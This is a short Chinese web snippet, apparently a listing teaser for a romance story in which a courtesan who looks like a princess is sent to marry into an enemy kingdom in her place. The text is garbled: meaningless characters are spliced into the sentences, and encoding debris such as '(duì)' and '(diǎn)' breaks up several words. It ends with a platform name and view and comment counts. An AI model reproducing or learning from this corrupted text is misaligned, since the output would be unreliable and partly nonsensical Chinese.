    正文 我出身青樓矩屁,卻偏偏與公主長得像辟宗,于是被迫代替她去往敵國和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子吝秕,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,691評(píng)論 2 361